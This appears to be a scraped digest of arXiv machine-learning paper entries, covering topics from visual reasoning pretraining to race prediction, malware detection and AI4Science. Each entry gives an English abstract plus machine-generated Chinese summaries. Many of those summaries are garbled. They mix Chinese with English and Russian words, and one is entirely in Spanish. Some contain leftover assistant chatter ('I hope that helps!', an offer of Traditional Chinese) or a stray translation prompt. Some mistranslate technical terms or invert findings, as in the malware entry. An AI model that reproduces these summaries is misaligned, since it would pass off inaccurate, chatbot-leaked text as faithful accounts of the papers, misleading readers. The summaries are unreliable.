We aim to investigate whether end-to-end learning of visual reasoning can be achieved with general-purpose neural networks, with the help of visual pretraining. A positive result would refute the common belief that explicit visual abstraction (e.g. object detection) is essential for compositional generalization on visual reasoning, and confirm the feasibility of a neural network "generalist" to solve visual recognition and reasoning tasks. We propose a simple and general self-supervised framework which "compresses" each video frame into a small set of tokens with a transformer network, and reconstructs the remaining frames based on the compressed temporal context. To minimize the reconstruction loss, the network must learn a compact representation for each image, as well as capture temporal dynamics and object permanence from temporal context. We perform evaluation on two visual reasoning benchmarks, CATER and ACRE. We observe that pretraining is essential to achieve compositional generalization for end-to-end visual reasoning. Our proposed framework outperforms traditional supervised pretraining, including image classification and explicit object detection, by large margins.

摘要
我们的目标是 investigate Whether end-to-end 视觉逻辑学习可以通过通用神经网络实现，帮助了由 visual pretraining 。一个正面的结果会证明 Explicit 视觉抽象（例如对象检测）不是必要的 для compositional generalization 的视觉逻辑任务，并证明神经网络 "通用" 可以解决视识别和逻辑任务。我们提出了一个简单和通用的自我超vised framework，将每帧视频图片"压缩" 成一个小集合 of tokens 使用 transformer 网络，并使用压缩的时间上下文来重建剩下的帧。为了降低重建损失，网络必须学习每幅图片的紧凑表示，以及从时间上下文中捕捉时间动态和对象的持续性。我们在 CATER 和 ACRE 两个视觉逻辑标准benchmark上进行评估，发现预训练是必要的，以实现 compositional generalization 的 end-to-end 视觉逻辑学习。我们提出的方法在图像分类和显式对象检测的传统预训练下，都有大幅度的优势。

Large-Scale Evaluation of Topic Models and Dimensionality Reduction Methods for 2D Text Spatialization

paper_url: http://arxiv.org/abs/2307.11770
repo_url: https://github.com/cgshpi/topic-models-and-dimensionality-reduction-benchmark
paper_authors: Daniel Atzberger, Tim Cech, Willy Scheibel, Matthias Trapp, Rico Richter, Jürgen Döllner, Tobias Schreck
for: 这个论文的目的是 investigate the effectiveness of topic models and dimensionality reduction methods for the spatialization of corpora as two-dimensional scatter plots.
methods: 该论文使用了多种主题模型和维度减少算法，并对它们的组合进行了大规模的计算评估。
results: 根据计算结果， interpretable topic models 能够很好地捕捉文本 Corpora 的结构，而 t-SNE 作为维度减少算法也有良好的效果。

Abstract
Topic models are a class of unsupervised learning algorithms for detecting the semantic structure within a text corpus. Together with a subsequent dimensionality reduction algorithm, topic models can be used for deriving spatializations for text corpora as two-dimensional scatter plots, reflecting semantic similarity between the documents and supporting corpus analysis. Although the choice of the topic model, the dimensionality reduction, and their underlying hyperparameters significantly impact the resulting layout, it is unknown which particular combinations result in high-quality layouts with respect to accuracy and perception metrics. To investigate the effectiveness of topic models and dimensionality reduction methods for the spatialization of corpora as two-dimensional scatter plots (or basis for landscape-type visualizations), we present a large-scale, benchmark-based computational evaluation. Our evaluation consists of (1) a set of corpora, (2) a set of layout algorithms that are combinations of topic models and dimensionality reductions, and (3) quality metrics for quantifying the resulting layout. The corpora are given as document-term matrices, and each document is assigned to a thematic class. The chosen metrics quantify the preservation of local and global properties and the perceptual effectiveness of the two-dimensional scatter plots. By evaluating the benchmark on a computing cluster, we derived a multivariate dataset with over 45 000 individual layouts and corresponding quality metrics. Based on the results, we propose guidelines for the effective design of text spatializations that are based on topic models and dimensionality reductions. As a main result, we show that interpretable topic models are beneficial for capturing the structure of text corpora. We furthermore recommend the use of t-SNE as a subsequent dimensionality reduction.

摘要
To investigate the effectiveness of topic models and dimensionality reduction methods for spatializing text corpora as two-dimensional scatter plots, we conducted a large-scale, benchmark-based computational evaluation. Our evaluation consisted of three parts:1. A set of corpora, given as document-term matrices, with each document assigned to a thematic class.2. A set of layout algorithms that combined topic models and dimensionality reductions.3. Quality metrics to quantify the resulting layout, including the preservation of local and global properties and the perceptual effectiveness of the two-dimensional scatter plots.We evaluated the benchmark on a computing cluster and derived a multivariate dataset with over 45,000 individual layouts and corresponding quality metrics. Our results show that interpretable topic models are beneficial for capturing the structure of text corpora, and we recommend the use of t-SNE as a subsequent dimensionality reduction. Based on our findings, we propose guidelines for the effective design of text spatializations that are based on topic models and dimensionality reductions.

Can We Trust Race Prediction?

paper_url: http://arxiv.org/abs/2307.08496
repo_url: https://github.com/cangyuanli/pyethnicity
paper_authors: Cangyuan Li
for: 这个论文是为了提高美国选民登记数据中的人口统计和地理编码的准确性而写的。
methods: 作者使用了irectional Long Short-Term Memory (BiLSTM) 模型和一个ensemble模型，并使用了一个新的选民登记数据集来提高模型的性能。
results: 作者通过创建了一个全面的美国人名和姓氏分布数据库，并提供了一个高品质的比较数据集，以提高 bayesian improved surname geocoding (BISG) 和 bayesian improved firstname surname geocoding (BIFSG) 的准确性。

Abstract
In the absence of sensitive race and ethnicity data, researchers, regulators, and firms alike turn to proxies. In this paper, I train a Bidirectional Long Short-Term Memory (BiLSTM) model on a novel dataset of voter registration data from all 50 US states and create an ensemble that achieves up to 36.8% higher out of sample (OOS) F1 scores than the best performing machine learning models in the literature. Additionally, I construct the most comprehensive database of first and surname distributions in the US in order to improve the coverage and accuracy of Bayesian Improved Surname Geocoding (BISG) and Bayesian Improved Firstname Surname Geocoding (BIFSG). Finally, I provide the first high-quality benchmark dataset in order to fairly compare existing models and aid future model developers.

摘要
在没有敏感的种族和族谱数据的情况下，研究人员、监管机构和公司都会寻找代理。在这篇论文中，我将一个 bidirectional Long Short-Term Memory（BiLSTM）模型训练在所有50个美国州的选民登记数据上，创建了一个ensemble，其在验证样本外的F1分数高达36.8%，较文献中最高performing机器学习模型高。此外，我还建立了美国最完整的姓名和名字分布数据库，以提高Bayesian Improved Surname Geocoding（BISG）和Bayesian Improved Firstname Surname Geocoding（BIFSG）的覆盖和精度。最后，我提供了第一个高品质的比较基准集，以便比较现有模型和未来的模型开发者。

Fairness in KI-Systemen

paper_url: http://arxiv.org/abs/2307.08486
repo_url: None
paper_authors: Janine Strotherm, Alissa Müller, Barbara Hammer, Benjamin Paaßen
for: 本文提供了关于机器学习中的公平研究的导入，包括主要的公平定义和实现公平的策略。
methods: 本文使用了可见的示例和图像来解释公平定义和策略，适用于多学科读者。
results: 本文提供了一个欧洲Context中的公平研究的导入，包括主要的公平定义和实现公平的策略。

Abstract
The more AI-assisted decisions affect people's lives, the more important the fairness of such decisions becomes. In this chapter, we provide an introduction to research on fairness in machine learning. We explain the main fairness definitions and strategies for achieving fairness using concrete examples and place fairness research in the European context. Our contribution is aimed at an interdisciplinary audience and therefore avoids mathematical formulation but emphasizes visualizations and examples. -- Je mehr KI-gest\"utzte Entscheidungen das Leben von Menschen betreffen, desto wichtiger ist die Fairness solcher Entscheidungen. In diesem Kapitel geben wir eine Einf\"uhrung in die Forschung zu Fairness im maschinellen Lernen. Wir erkl\"aren die wesentlichen Fairness-Definitionen und Strategien zur Erreichung von Fairness anhand konkreter Beispiele und ordnen die Fairness-Forschung in den europ\"aischen Kontext ein. Unser Beitrag richtet sich dabei an ein interdisziplin\"ares Publikum und verzichtet daher auf die mathematische Formulierung sondern betont Visualisierungen und Beispiele.

摘要
更多的AI助け的决策对人们的生活产生了影响，因此决策的公正性变得越来越重要。在这章中，我们提供了对决策公正性的研究Introduction，并解释了主要的公正性定义和在实际示例中实现公正性的策略。我们的贡献是向多学科读者群体进行了定向，因此弃用了数学表述，而是强调视觉化和示例。In this chapter, we provide an introduction to research on fairness in machine learning. We explain the main fairness definitions and strategies for achieving fairness using concrete examples and place fairness research in the European context. Our contribution is aimed at an interdisciplinary audience and therefore avoids mathematical formulation but emphasizes visualizations and examples. As AI-assisted decisions increasingly affect people's lives, the fairness of such decisions becomes more important.

Cross Feature Selection to Eliminate Spurious Interactions and Single Feature Dominance Explainable Boosting Machines

paper_url: http://arxiv.org/abs/2307.08485
repo_url: None
paper_authors: Shree Charran R, Sandipan Das Mahapatra
for: 本研究旨在提高EBM模型的解释性和可靠性，并应用于各种预测任务中。
methods: 本研究使用了 alternate 横向选择、集成特征和模型配置变更等技术来解决EBM模型中的干扰和单个特征主导问题。
results: 对三个 benchmark 数据集进行了评估，结果表明 alternate 技术可以超越原始 EBM 方法，提供更好的解释性和特征选择稳定性，并提高模型的预测性能。

Abstract
Interpretability is a crucial aspect of machine learning models that enables humans to understand and trust the decision-making process of these models. In many real-world applications, the interpretability of models is essential for legal, ethical, and practical reasons. For instance, in the banking domain, interpretability is critical for lenders and borrowers to understand the reasoning behind the acceptance or rejection of loan applications as per fair lending laws. However, achieving interpretability in machine learning models is challenging, especially for complex high-performance models. Hence Explainable Boosting Machines (EBMs) have been gaining popularity due to their interpretable and high-performance nature in various prediction tasks. However, these models can suffer from issues such as spurious interactions with redundant features and single-feature dominance across all interactions, which can affect the interpretability and reliability of the model's predictions. In this paper, we explore novel approaches to address these issues by utilizing alternate Cross-feature selection, ensemble features and model configuration alteration techniques. Our approach involves a multi-step feature selection procedure that selects a set of candidate features, ensemble features and then benchmark the same using the EBM model. We evaluate our method on three benchmark datasets and show that the alternate techniques outperform vanilla EBM methods, while providing better interpretability and feature selection stability, and improving the model's predictive performance. Moreover, we show that our approach can identify meaningful interactions and reduce the dominance of single features in the model's predictions, leading to more reliable and interpretable models. Index Terms- Interpretability, EBM's, ensemble, feature selection.

摘要
<> translate the following text into Simplified Chinese<>机器学习模型的可解释性是一个关键的特点，它使得人们可以更好地理解和信任机器学习模型的决策过程。在实际应用中，机器学习模型的可解释性是非常重要的，特别是在银行领域。在这个领域中，可解释性是对借款申请的 Accept 或 Reject 决策进行法律、伦理和实用上的要求。然而，实现机器学习模型的可解释性是一个挑战，特别是在复杂高性能模型中。因此，可解释性增强的机器学习模型（EBM）在各种预测任务中得到了广泛的应用。然而，这些模型可能会面临一些问题，如 redundancy 特征之间的干扰和单个特征在所有交互中的占主导地位，这些问题可能会影响模型预测的可靠性和解释性。在这篇论文中，我们探讨了一些新的方法来解决这些问题，包括使用另一种 Cross-feature 选择、ensemble 特征和模型配置变化技术。我们的方法包括一个多步特征选择过程，选择一组候选特征、ensemble特征，然后使用 EBM 模型来评估。我们在三个 benchmark 数据集上评估了我们的方法，并显示了它们在比vanilla EBM方法更高的可解释性和特征选择稳定性，以及提高模型预测性能。此外，我们还发现了我们的方法可以找到有意义的交互和减少单个特征在模型预测中的主导地位，从而提高模型的可靠性和解释性。Index Terms- 可解释性, EBM, ensemble, 特征选择.

A Fast Task Offloading Optimization Framework for IRS-Assisted Multi-Access Edge Computing System

paper_url: http://arxiv.org/abs/2307.08474
repo_url: https://github.com/uic-jq/iopo
paper_authors: Jianqiu Wu, Zhongyi Yu, Jianxiong Guo, Zhiqing Tang, Tian Wang, Weijia Jia
for: 这个论文旨在提高无线网络，尤其是基于飞行器多访问边缘计算系统。
methods: 该论文提出了一种基于深度学习的优化框架，称为迭代保持顺序决策（IOPO），用于生成高质量的任务卸载分配。
results: 实验结果表明，该提议的框架可以在很短的时间内生成高效的任务卸载决策，超过其他标准方法。

Abstract
Terahertz communication networks and intelligent reflecting surfaces exhibit significant potential in advancing wireless networks, particularly within the domain of aerial-based multi-access edge computing systems. These technologies enable efficient offloading of computational tasks from user electronic devices to Unmanned Aerial Vehicles or local execution. For the generation of high-quality task-offloading allocations, conventional numerical optimization methods often struggle to solve challenging combinatorial optimization problems within the limited channel coherence time, thereby failing to respond quickly to dynamic changes in system conditions. To address this challenge, we propose a deep learning-based optimization framework called Iterative Order-Preserving policy Optimization (IOPO), which enables the generation of energy-efficient task-offloading decisions within milliseconds. Unlike exhaustive search methods, IOPO provides continuous updates to the offloading decisions without resorting to exhaustive search, resulting in accelerated convergence and reduced computational complexity, particularly when dealing with complex problems characterized by extensive solution spaces. Experimental results demonstrate that the proposed framework can generate energy-efficient task-offloading decisions within a very short time period, outperforming other benchmark methods.

摘要
“tera兆通信网络和智能反射表示技术在提高无线网络方面具有 significannot potential，特别是在基于飞行器多访问边缘计算系统中。这些技术可以有效地减轻用户电子设备中的计算任务到无人飞行机或本地执行。为生成高质量的任务卸载分配，常见的数字优化方法经常陷入在限制性减震时间内的复杂 combinatorial 优化问题中，从而无法快速应对系统条件的动态变化。为解决这个挑战，我们提出了一种基于深度学习的优化框架，即迭代保持顺序分配优化（IOPO）。与极限搜索方法不同，IOPO可以在毫秒级时间内生成能效的任务卸载决策，而无需进行极限搜索，从而降低计算复杂性，特别是在面临复杂问题时。实验结果表明，提议的框架可以在很短的时间内生成能效的任务卸载决策，超过了其他 Referenced 方法。”

Hidden Markov Models with Random Restarts vs Boosting for Malware Detection

paper_url: http://arxiv.org/abs/2307.10256
repo_url: None
paper_authors: Aditya Raghavan, Fabio Di Troia, Mark Stamp
for: 这个研究是为了提高适当的黑客病毒检测方法。
methods: 这个研究使用了隐藏Markovchain模型（HMM）和AdaBoost数据集训练方法。
results: 研究发现，Random Restarts方法在训练数据匮乏时表现出来 surprisingly well，而boosting则仅在最困难的“冰结”案例（训练数据匮乏）中能够提供足够的改善，以正fi运算阶段的computational cost。

Abstract
Effective and efficient malware detection is at the forefront of research into building secure digital systems. As with many other fields, malware detection research has seen a dramatic increase in the application of machine learning algorithms. One machine learning technique that has been used widely in the field of pattern matching in general-and malware detection in particular-is hidden Markov models (HMMs). HMM training is based on a hill climb, and hence we can often improve a model by training multiple times with different initial values. In this research, we compare boosted HMMs (using AdaBoost) to HMMs trained with multiple random restarts, in the context of malware detection. These techniques are applied to a variety of challenging malware datasets. We find that random restarts perform surprisingly well in comparison to boosting. Only in the most difficult "cold start" cases (where training data is severely limited) does boosting appear to offer sufficient improvement to justify its higher computational cost in the scoring phase.

摘要
“有效和高效的恶意软件检测是当前安全数字系统研究的核心。与其他领域一样，恶意软件检测研究在使用机器学习算法方面表现了快速增长。一种广泛应用于模式匹配领域（包括恶意软件检测）的机器学习技术是隐藏Markov模型（HMM）。HMM训练基于山峰搜索，因此可以通过不同的初始值进行多次训练以改进模型。在这项研究中，我们比较了使用AdaBoost加强HMM和多个随机重启来进行恶意软件检测。这些技术在许多复杂的恶意软件数据集中进行应用。我们发现，随机重启 surprisingly well 在对抗“冰结”（训练数据 severely limited）情况下表现出色，而boosting 只在这些情况下能够提供足够的改进，以 justify its higher computational cost in the scoring phase。”Note that the translation is in Simplified Chinese, which is the standard form of Chinese used in mainland China and Singapore. If you need Traditional Chinese, please let me know.

Generalizable Classification of UHF Partial Discharge Signals in Gas-Insulated HVDC Systems Using Neural Networks

paper_url: http://arxiv.org/abs/2307.08466
repo_url: None
paper_authors: Steffen Seitz, Thomas Götz, Christopher Lindenberg, Ronald Tetzlaff, Stephan Schlegel
for: 本研究旨在为高压直流绝缘系统（HVDC GIS）中检测未探测到的部分磁振（PD）提供一种基于神经网络的分类方法，无需基于振荡序列分析特征。
methods: 本研究使用神经网络分类方法，并对时域和频域输入信号进行比较，以及不同 нормализа schemes的影响。
results: 研究发现，使用神经网络分类方法可以区分由金属凸起和导电粒子引起的PD信号，并且可以在不同的运行电压多пли中进行泛化。

Abstract
Undetected partial discharges (PDs) are a safety critical issue in high voltage (HV) gas insulated systems (GIS). While the diagnosis of PDs under AC voltage is well-established, the analysis of PDs under DC voltage remains an active research field. A key focus of these investigations is the classification of different PD sources to enable subsequent sophisticated analysis. In this paper, we propose and analyze a neural network-based approach for classifying PD signals caused by metallic protrusions and conductive particles on the insulator of HVDC GIS, without relying on pulse sequence analysis features. In contrast to previous approaches, our proposed model can discriminate the studied PD signals obtained at negative and positive potentials, while also generalizing to unseen operating voltage multiples. Additionally, we compare the performance of time- and frequency-domain input signals and explore the impact of different normalization schemes to mitigate the influence of free-space path loss between the sensor and defect location.

摘要
未探测的偏置负荷（PD）是高压直流瓦尔瑙系统（GIS）中的安全关键问题。 Although the diagnosis of PDs under AC voltage is well established, the analysis of PDs under DC voltage remains an active research field. A key focus of these investigations is the classification of different PD sources to enable subsequent sophisticated analysis.在本文中，我们提出了一种基于神经网络的方法，用于分类HVDC GIS中的卷积物和导电粒子引起的PD信号，不需要基于激射序列分析特征。与前一些方法不同，我们的提议的模型可以在负和正潜能下分辨出 studied PD signals，同时还能泛化到未经见过的操作电压倍数。此外，我们还比较了时域和频域输入信号的性能，并探讨了不同的normalization schemes来减少卷积物和导电粒子之间的自由空间通路损失的影响。

A benchmark of categorical encoders for binary classification

paper_url: http://arxiv.org/abs/2307.09191
repo_url: https://github.com/drcohomology/encoderbenchmarking
paper_authors: Federico Matteucci, Vadim Arzamasov, Klemens Boehm
for: 本研究是机器学习领域中 categorical 编码器的最全面的比较研究，涵盖了多种编码器家族的32种配置，以及36种实验因素的组合，在50个数据集上进行了广泛的评估。
methods: 本研究使用了多种编码器家族的32种配置，以及36种实验因素的组合，在50个数据集上进行了广泛的评估。
results: 研究发现，选择数据集、实验因素和综合策略会对比较结论产生深远的影响，这些因素在先前的编码器比较中未得到考虑。

Abstract
Categorical encoders transform categorical features into numerical representations that are indispensable for a wide range of machine learning models. Existing encoder benchmark studies lack generalizability because of their limited choice of (1) encoders, (2) experimental factors, and (3) datasets. Additionally, inconsistencies arise from the adoption of varying aggregation strategies. This paper is the most comprehensive benchmark of categorical encoders to date, including an extensive evaluation of 32 configurations of encoders from diverse families, with 36 combinations of experimental factors, and on 50 datasets. The study shows the profound influence of dataset selection, experimental factors, and aggregation strategies on the benchmark's conclusions -- aspects disregarded in previous encoder benchmarks.

摘要
categorical 编码器将 categorical 特征转换为数字表示形式，这些表示形式是机器学习模型的不可或缺的一部分。现有的编码器比较研究受到限制因为它们选择的（1）编码器、（2）实验因素和（3）数据集的选择有限。此外，由于不同的汇集策略的采用，导致了不一致性。这篇论文是目前最全面的 categorical 编码器比较研究，包括了32种编码器家族中的广泛评估，以及36种实验因素的组合，和50个数据集的评估。研究显示数据集选择、实验因素和汇集策略对比较的结论产生了深远的影响，这些因素在前一次编码器比较中被忽略了。

SBMLtoODEjax: efficient simulation and optimization of ODE SBML models in JAX

paper_url: http://arxiv.org/abs/2307.08452
repo_url: https://github.com/flowersteam/sbmltoodejax
paper_authors: Mayalen Etcheverry, Michael Levin, Clément Moulin-Frier, Pierre-Yves Oudeyer
for: 这篇论文是为了提供一个可以自动将系统生物学标记语言（SBML）模型转换成Python代码的轻量级库。
methods: 该库使用JAX高性能数学计算库自动推导 capabilities来实现高效的数字化模拟和优化。
results: 该库可以帮助研究人员快速将SBML模型integrated into ихPython项目和机器学习管道，只需几行代码即可实现高性能的数字化模拟和优化。

Abstract
Developing methods to explore, predict and control the dynamic behavior of biological systems, from protein pathways to complex cellular processes, is an essential frontier of research for bioengineering and biomedicine. Thus, significant effort has gone in computational inference and mathematical modeling of biological systems. This effort has resulted in the development of large collections of publicly-available models, typically stored and exchanged on online platforms (such as the BioModels Database) using the Systems Biology Markup Language (SBML), a standard format for representing mathematical models of biological systems. SBMLtoODEjax is a lightweight library that allows to automatically parse and convert SBML models into python models written end-to-end in JAX, a high-performance numerical computing library with automatic differentiation capabilities. SBMLtoODEjax is targeted at researchers that aim to incorporate SBML-specified ordinary differential equation (ODE) models into their python projects and machine learning pipelines, in order to perform efficient numerical simulation and optimization with only a few lines of code. SBMLtoODEjax is available at https://github.com/flowersteam/sbmltoodejax.

摘要
开发方法来探索、预测和控制生物系统的动态行为，从蛋白道路到复杂的细胞过程，是生物工程和生物医学研究的关键前沿。因此，在计算推理和数学模型化方面的努力很大，以致已经形成了大量的公共可用模型，通常通过在线平台（如生物模型数据库）存储和交换，使用系统生物学标记语言（SBML），这是表示生物系统数学模型的标准格式。SBMLtoODEjax 是一个轻量级库，它可以自动解析和将 SBML 模型转换为 Python 模型，并将其写入终端到终端在 JAX 中，JAX 是一个高性能的数值计算库，具有自动导数能力。SBMLtoODEjax 是为研究者们提供，他们想将 SBML 规定的常微分方程（ODE）模型 integrate 到他们的 Python 项目和机器学习管道中，以实现高效的数值优化和优化，只需几行代码。SBMLtoODEjax 可以在 GitHub 上找到：https://github.com/flowersteam/sbmltoodejax。

From random-walks to graph-sprints: a low-latency node embedding framework on continuous-time dynamic graphs

paper_url: http://arxiv.org/abs/2307.08433
repo_url: None
paper_authors: Ahmad Naser Eddin, Jacopo Bono, David Aparício, Hugo Ferreira, João Ascensão, Pedro Ribeiro, Pedro Bizarro
for: 这篇研究是为了提出一个能够实现低延迟、高效的动态图像学习框架，并且能够处理真实世界的动态图像资料。
methods: 这篇研究使用了流动测量的方法，即时间感知的点 cloud 来捕捉多阶资讯，并且使用了单一阶资讯来计算时间感知的点 cloud。
results: 研究结果显示，使用 graph-sprints 的方法可以实现与现有的高延迟模型相同或更好的性能，并且可以实现低延迟的推断运算。

Abstract
Many real-world datasets have an underlying dynamic graph structure, where entities and their interactions evolve over time. Machine learning models should consider these dynamics in order to harness their full potential in downstream tasks. Previous approaches for graph representation learning have focused on either sampling k-hop neighborhoods, akin to breadth-first search, or random walks, akin to depth-first search. However, these methods are computationally expensive and unsuitable for real-time, low-latency inference on dynamic graphs. To overcome these limitations, we propose graph-sprints a general purpose feature extraction framework for continuous-time-dynamic-graphs (CTDGs) that has low latency and is competitive with state-of-the-art, higher latency models. To achieve this, a streaming, low latency approximation to the random-walk based features is proposed. In our framework, time-aware node embeddings summarizing multi-hop information are computed using only single-hop operations on the incoming edges. We evaluate our proposed approach on three open-source datasets and two in-house datasets, and compare with three state-of-the-art algorithms (TGN-attn, TGN-ID, Jodie). We demonstrate that our graph-sprints features, combined with a machine learning classifier, achieve competitive performance (outperforming all baselines for the node classification tasks in five datasets). Simultaneously, graph-sprints significantly reduce inference latencies, achieving close to an order of magnitude speed-up in our experimental setting.

摘要
muchos datos del mundo real tienen una estructura de grafo subyacente dinámica, donde las entidades y sus interacciones evolucionan con el tiempo. Los modelos de aprendizaje automático deben considerar estas dinámicas para aprovechar su potencial completo en tareas downstream. Los enfoques anteriores para aprender representaciones de grafos han centrado en la muestra de neighbborhoods k-hop, similar a búsqueda en profundidad, o caminatas aleatorias, similar a búsqueda en anchura. Sin embargo, estos métodos son costosos en términos de computación y no son adecuados para inferencia en tiempo real y baja latencia en grafos dinámicos. Para superar estos límites, propusimos graph-sprints, un marco general de extracción de características para grafos continuos en tiempo dinámico (CTDGs) que tiene baja latencia y es competitivo con modelos de estado del arte de mayor latencia. Para lograr esto, se propone una aproximación de bajo latencia y streaming a las características basadas en caminatas aleatorias. En nuestro marco, las embeddings de nodos conscientes del tiempo resumen la información de múltiples hop utilizando solo operaciones de un hop en las aristas entrantes. Evaluamos nuestro enfoque propuesto en tres conjuntos de datos abiertos y dos conjuntos de datos internos, y lo comparamos con tres algoritmos estado del arte (TGN-attn, TGN-ID, Jodie). Demostramos que nuestras características de graph-sprints, combinadas con una clase de aprendizaje automático, logran rendimientos competitivos (superando a todos los baselines para las tareas de clasificación de nodos en cinco conjuntos de datos). Al mismo tiempo, graph-sprints reduce significativamente las latencias de inferencia, logrando una reducción de cerca de un orden de magnitud en nuestra configuración experimental.

Artificial Intelligence for Science in Quantum, Atomistic, and Continuum Systems

paper_url: http://arxiv.org/abs/2307.08423
repo_url: https://github.com/divelab/AIRS
paper_authors: Xuan Zhang, Limei Wang, Jacob Helwig, Youzhi Luo, Cong Fu, Yaochen Xie, Meng Liu, Yuchao Lin, Zhao Xu, Keqiang Yan, Keir Adams, Maurice Weiler, Xiner Li, Tianfan Fu, Yucheng Wang, Haiyang Yu, YuQing Xie, Xiang Fu, Alex Strasser, Shenglong Xu, Yi Liu, Yuanqi Du, Alexandra Saxton, Hongyi Ling, Hannah Lawrence, Hannes Stärk, Shurui Gui, Carl Edwards, Nicholas Gao, Adriana Ladera, Tailin Wu, Elyssa F. Hofgard, Aria Mansouri Tehrani, Rui Wang, Ameya Daigavane, Montgomery Bohde, Jerry Kurtin, Qian Huang, Tuong Phung, Minkai Xu, Chaitanya K. Joshi, Simon V. Mathis, Kamyar Azizzadenesheli, Ada Fang, Alán Aspuru-Guzik, Erik Bekkers, Michael Bronstein, Marinka Zitnik, Anima Anandkumar, Stefano Ermon, Pietro Liò, Rose Yu, Stephan Günnemann, Jure Leskovec, Heng Ji, Jimeng Sun, Regina Barzilay, Tommi Jaakkola, Connor W. Coley, Xiaoning Qian, Xiaofeng Qian, Tess Smidt, Shuiwang Ji
for: 这篇论文主要针对的是利用人工智能（AI）进行自然科学研究（AI4Science）的新 paradigm。
methods: 论文使用的方法包括深度学习方法，以捕捉自然系统中的物理原理，特别是对称变换的equivariance。
results: 论文提供了一种Foundational and unified treatment of AI for quantum, atomistic, and continuum systems，并提出了一些解释性、过度分布采样和不确定性评估等技术挑战。

Abstract
Advances in artificial intelligence (AI) are fueling a new paradigm of discoveries in natural sciences. Today, AI has started to advance natural sciences by improving, accelerating, and enabling our understanding of natural phenomena at a wide range of spatial and temporal scales, giving rise to a new area of research known as AI for science (AI4Science). Being an emerging research paradigm, AI4Science is unique in that it is an enormous and highly interdisciplinary area. Thus, a unified and technical treatment of this field is needed yet challenging. This paper aims to provide a technically thorough account of a subarea of AI4Science; namely, AI for quantum, atomistic, and continuum systems. These areas aim at understanding the physical world from the subatomic (wavefunctions and electron density), atomic (molecules, proteins, materials, and interactions), to macro (fluids, climate, and subsurface) scales and form an important subarea of AI4Science. A unique advantage of focusing on these areas is that they largely share a common set of challenges, thereby allowing a unified and foundational treatment. A key common challenge is how to capture physics first principles, especially symmetries, in natural systems by deep learning methods. We provide an in-depth yet intuitive account of techniques to achieve equivariance to symmetry transformations. We also discuss other common technical challenges, including explainability, out-of-distribution generalization, knowledge transfer with foundation and large language models, and uncertainty quantification. To facilitate learning and education, we provide categorized lists of resources that we found to be useful. We strive to be thorough and unified and hope this initial effort may trigger more community interests and efforts to further advance AI4Science.

摘要
人工智能技术的发展（AI）正在推动一种新的发现 paradigm in 自然科学。今天，AI已经开始为自然科学的研究提供了改进、加速和实现自然现象的理解，从而创造了一个新的研究领域——AI for science（AI4Science）。作为一个emerging research paradigm，AI4Science具有巨大的多学科性和挑战性，因此需要一种统一和技术性的处理。本文的目的是提供AI4Science中的一个子领域的技术深入报告，即用AI研究量子、原子istic和连续体系。这些领域旨在理解自然世界从子原子（振荡函数和电子密度）、原子（分子、蛋白质、材料和交互）到宏观（液体、气候和地壳）级别的物理世界，并形成AI4Science中一个重要的子领域。这些领域之间共享许多挑战，因此可以实现一种统一和基础的处理。一个关键的共同挑战是如何通过深度学习方法捕捉自然系统中的物理基本原理，特别是对称性。我们提供了深入 yet 易于理解的对于实现对称变换的方法的详细讲解。我们还讨论了其他一些常见的技术挑战，包括可解释性、out-of-distribution扩展、基础和大语言模型知识传递、和不确定性评估。为便于学习和教育，我们提供了分类列表，我们认为是有用的资源。我们努力保持统一和完整，希望这个初步努力可以触发更多的社区兴趣和努力，以进一步推动AI4Science的发展。

Neurosymbolic AI for Reasoning on Biomedical Knowledge Graphs

paper_url: http://arxiv.org/abs/2307.08411
repo_url: None
paper_authors: Lauren Nicole DeLong, Ramon Fernández Mir, Zonglin Ji, Fiona Niamh Coulter Smith, Jacques D. Fleuriot
for: 这篇论文旨在介绍基于神经符号智能的 hybrid 方法，以及其在生物医学领域中的应用和优势。
methods: 这篇论文主要介绍了基于 embedding 和符号 logic 的 hybrid 方法，以及它们在生物医学领域中的应用。
results: 论文总结了 hybrid 方法的优势和可能性，并指出了它们在生物医学领域中的应用可能性。I hope that helps! Let me know if you have any other questions.

Abstract
Biomedical datasets are often modeled as knowledge graphs (KGs) because they capture the multi-relational, heterogeneous, and dynamic natures of biomedical systems. KG completion (KGC), can, therefore, help researchers make predictions to inform tasks like drug repositioning. While previous approaches for KGC were either rule-based or embedding-based, hybrid approaches based on neurosymbolic artificial intelligence are becoming more popular. Many of these methods possess unique characteristics which make them even better suited toward biomedical challenges. Here, we survey such approaches with an emphasis on their utilities and prospective benefits for biomedicine.

摘要

Vocoder drift compensation by x-vector alignment in speaker anonymisation

paper_url: http://arxiv.org/abs/2307.08403
repo_url: None
paper_authors: Michele Panariello, Massimiliano Todisco, Nicholas Evans
for: 本研究旨在探讨xvector基于的听者隐私保护方法中， vocoding而不是核心隐私函数对听者隐私的保护产生了主要的影响。
methods: 本研究使用了一种新的方法来衡量 vocoder drift，并提出了一种新的隐私函数来减少 vocoder drift。
results: 研究发现，使用新的隐私函数可以有效地减少 vocoder drift，并提供了更好的控制 sobre xvector 空间。

Abstract
For the most popular x-vector-based approaches to speaker anonymisation, the bulk of the anonymisation can stem from vocoding rather than from the core anonymisation function which is used to substitute an original speaker x-vector with that of a fictitious pseudo-speaker. This phenomenon can impede the design of better anonymisation systems since there is a lack of fine-grained control over the x-vector space. The work reported in this paper explores the origin of so-called vocoder drift and shows that it is due to the mismatch between the substituted x-vector and the original representations of the linguistic content, intonation and prosody. Also reported is an original approach to vocoder drift compensation. While anonymisation performance degrades as expected, compensation reduces vocoder drift substantially, offers improved control over the x-vector space and lays a foundation for the design of better anonymisation functions in the future.

摘要
Translation notes:* "x-vector" is translated as "语音特征向量" (yùn zhòng yǐn xiàng wù)* "vocoding" is translated as "语音编码" (yùn zhòng biān mǎ)* "anonymization" is translated as "匿名化" (mìng mìng huà)* "core anonymization function" is translated as "核心匿名函数" (zhū xīn mìng mìng fù xiàng)* "fictitious pseudo-speaker" is translated as "虚拟的假发音者" (xū yì de jiǎ fā yīn zhě)* "linguistic content, intonation, and prosody" are translated as "语言内容、听调和语调" (yǔ yán nèi xìng, tīng diào hé yǔ diào)* "vocoder drift compensation" is translated as "语音编码落差补做" (yùn zhòng biān mǎ lù chē bǔ zuò)

On the application of Large Language Models for language teaching and assessment technology

paper_url: http://arxiv.org/abs/2307.08393
repo_url: None
paper_authors: Andrew Caines, Luca Benedetto, Shiva Taslimipoor, Christopher Davis, Yuan Gao, Oeistein Andersen, Zheng Yuan, Mark Elliott, Russell Moore, Christopher Bryant, Marek Rei, Helen Yannakoudakis, Andrew Mullooly, Diane Nicholls, Paula Buttery
for: 这篇论文探讨了用大型自然语言处理模型（PaLM和GPT-4）在语言教学和评估系统中的潜在应用。
